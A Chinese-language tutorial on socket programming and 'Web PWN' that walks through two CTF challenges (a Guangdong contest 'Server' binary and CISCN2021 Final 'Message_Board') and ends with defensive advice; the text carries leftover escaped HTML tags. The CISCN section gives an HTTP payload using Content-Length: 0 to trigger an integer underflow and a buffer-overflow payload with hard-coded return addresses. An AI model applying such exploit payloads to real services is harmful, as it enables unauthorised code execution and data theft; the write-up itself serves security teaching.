Web PWN 基础与实战总结<\/h1>

一、Socket 套接字基础<\/h2>

1. 基本概念<\/h3>

套接字是网络编程中的通信机制，是支持 TCP\/IP 网络通信的基本操作单元，可以看作是不同主机之间进程进行双向通信的端点。<\/p>

关键要素：<\/strong><\/p>

IP 地址<\/strong>：源 IP 标识发送方区域，目的 IP 标识接收方具体位置<\/li>
端口号<\/strong>：16 位整数，标识主机上的特定进程

一个端口号只能被一个进程占用<\/li>
IP + 端口号能唯一标识网络上的某一主机的某一进程<\/li> <\/ul> <\/li> <\/ul>
2. Socket API 详解<\/h3>
核心函数<\/h4>

socket()<\/strong> - 创建套接字<\/p>
int<\/span> socket<\/span>(int<\/span> domain, int<\/span> type, int<\/span> protocol); <\/span><\/span><\/code><\/pre> 参数： domain<\/code>：协议族（AF_INET: IPv4, AF_INET6: IPv6）<\/li> type<\/code>：套接字类型（SOCK_STREAM: TCP, SOCK_DGRAM: UDP）<\/li> protocol<\/code>：通常为 0（自动选择）<\/li> <\/ul> <\/li> <\/ul> <\/li> bind()<\/strong> - 绑定端口号<\/p> int<\/span> bind<\/span>(int<\/span> socket, const<\/span> struct<\/span> sockaddr *<\/span>address, socklen_t address_len); <\/span><\/span><\/code><\/pre><\/li> listen()<\/strong> - 开始监听<\/p> int<\/span> listen<\/span>(int<\/span> socket, int<\/span> backlog); <\/span><\/span><\/code><\/pre> backlog<\/code>：连接请求队列的最大长度<\/li> <\/ul> <\/li> accept()<\/strong> - 接受连接<\/p> int<\/span> accept<\/span>(int<\/span> socket, struct<\/span> sockaddr*<\/span> address, socklen_t*<\/span> address_len); <\/span><\/span><\/code><\/pre><\/li> connect()<\/strong> - 建立连接<\/p> int<\/span> connect<\/span>(int<\/span> sockfd, const<\/span> struct<\/span> sockaddr *<\/span>addr, socklen_t addrlen); <\/span><\/span><\/code><\/pre><\/li> close()<\/strong> - 关闭套接字<\/p> int<\/span> close<\/span>(int<\/span> fd); <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3. TCP 通信流程<\/h3> 服务器端流程：<\/strong><\/p> 创建套接字 (socket)<\/li> 绑定端口 (bind)<\/li> 开始监听 (listen)<\/li> 接受连接 (accept)<\/li> 数据收发 (send\/recv)<\/li> 关闭连接 (close)<\/li> <\/ol> 客户端流程：<\/strong><\/p> 创建套接字 (socket)<\/li> 连接服务器 (connect)<\/li> 数据收发 (send\/recv)<\/li> 关闭连接 (close)<\/li> <\/ol> 二、二进制安全实战分析<\/h2> 1. 广东省第三届信息安全大赛 - Server 题目分析<\/h3> 静态分析关键点<\/h4> fd =<\/span> socket(2<\/span>, 1<\/span>, 0<\/span>); \/\/ AF_INET(2), SOCK_STREAM(1), 自动选择协议(0) <\/span><\/span><\/span><\/span>addr.sa_family =<\/span> 2<\/span>; \/\/ AF_INET <\/span><\/span><\/span><\/span>*<\/span>(_WORD *<\/span>)addr.sa_data =<\/span> htons(0x2A88u<\/span>); \/\/ 端口号 10888 <\/span><\/span><\/span><\/span>bind(fd, &<\/span>addr, 0x10u<\/span>); <\/span><\/span>listen(fd, 2<\/span>); <\/span><\/span><\/code><\/pre>关键漏洞点：<\/strong><\/p> 接收数据： v13 =<\/span> recv(v14, buf, 0x80uLL<\/span>, 0<\/span>); <\/span><\/span>buf[v13 -<\/span> 1<\/span>] =<\/span> 0<\/span>; \/\/ 手动添加字符串结束符 <\/span><\/span><\/span><\/code><\/pre><\/li> 字符串分割： v12 =<\/span> strtok(buf, ":"<\/span>); \/\/ 第一个冒号前的内容 <\/span><\/span><\/span><\/span>v11 =<\/span> strtok(0LL<\/span>, ":"<\/span>); \/\/ 第一个冒号后的内容 <\/span><\/span><\/span><\/code><\/pre><\/li> 关键函数调用： src =<\/span> sub_400B8A((__int64<\/span>)v12, (__int64<\/span>)v11); <\/span><\/span><\/code><\/pre><\/li> <\/ol> 漏洞利用思路<\/h4> 通过构造特定格式的输入（如 "0:00"）触发整数溢出<\/li> 利用溢出条件覆盖关键变量（如文件指针）<\/li> 最终目标是读取 flag 文件而非默认的 msg 文件<\/li> <\/ol> 2. CISCN2021 Final - Message_Board 题目分析<\/h3> 漏洞分析<\/h4> 关键漏洞：<\/strong><\/p> size_t n =<\/span> Content-<\/span>Length; \/\/ 用户可控 <\/span><\/span><\/span><\/span>while<\/span> (n--<\/span>) { \/\/ 当n=0时，n--会变为极大值 <\/span><\/span><\/span><\/span> \/\/ 缓冲区操作 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>利用方法：<\/strong><\/p> 通过设置 Content-Length: 0 触发整数溢出<\/li> 构造ROP链或控制程序流<\/li> 利用文件读取功能泄露flag<\/li> <\/ol> 利用步骤<\/h4> 发送特殊构造的HTTP请求： payload =<\/span> b<\/span>'POST \/submit HTTP\/1.1<\/span>\r\n<\/span>Content-Length: 0<\/span>\r\n<\/span>Cookie: Username=flag;Messages=flag<\/span>\r\n\r\n<\/span>'<\/span> <\/span><\/span><\/code><\/pre><\/li> 构造ROP链覆盖返回地址： payload =<\/span> b<\/span>'a'<\/span>*<\/span>(0x82e<\/span>-<\/span>14<\/span>+<\/span>8<\/span>) +<\/span> p32(0x804C180<\/span>+<\/span>0x42c<\/span>+<\/span>len('Cookie: Username=flag;Messages='<\/span>)) +<\/span> p32(0x80492BD<\/span>) <\/span><\/span><\/code><\/pre><\/li> 利用文件读取功能获取flag<\/li> <\/ol> 三、补充知识<\/h2> 1. accept() 函数深入<\/h3> 内核实现关键点：<\/strong><\/p> 创建新的socket实例<\/li> 阻塞等待三次握手完成<\/li> 从全连接队列中取出socket<\/li> 将socket与新连接绑定<\/li> <\/ol> 返回值：<\/strong><\/p> 成功：返回新的文件描述符<\/li> 失败：返回-1<\/li> <\/ul> 2. 网络字节序转换<\/h3> 常用函数：<\/p> htons()<\/code> - 主机到网络短整型<\/li> htonl()<\/code> - 主机到网络长整型<\/li> ntohs()<\/code> - 网络到主机短整型<\/li> ntohl()<\/code> - 网络到主机长整型<\/li> <\/ul> 四、防御建议<\/h2> 输入验证<\/strong>：<\/p> 严格检查所有输入数据的长度和格式<\/li> 对特殊字符进行过滤或转义<\/li> <\/ul> <\/li> 整数溢出防护<\/strong>：<\/p> 使用安全的数据类型和检查<\/li> 对可能溢出的操作进行边界检查<\/li> <\/ul> <\/li> 内存安全<\/strong>：<\/p> 使用安全的字符串操作函数<\/li> 启用编译器的安全保护机制（如栈保护）<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 最小权限原则运行服务<\/li> 隔离敏感操作<\/li> <\/ul> <\/li> <\/ol> 五、总结<\/h2> Web PWN 题目通常结合网络编程漏洞和二进制漏洞，需要掌握：<\/p> 网络协议和套接字编程基础<\/li> 二进制漏洞分析与利用技术<\/li> 特定场景下的漏洞利用技巧<\/li> 防御措施的绕过方法<\/li> <\/ol> 通过分析实际比赛题目，可以深入理解这些技术的实际应用场景和利用方法。<\/p>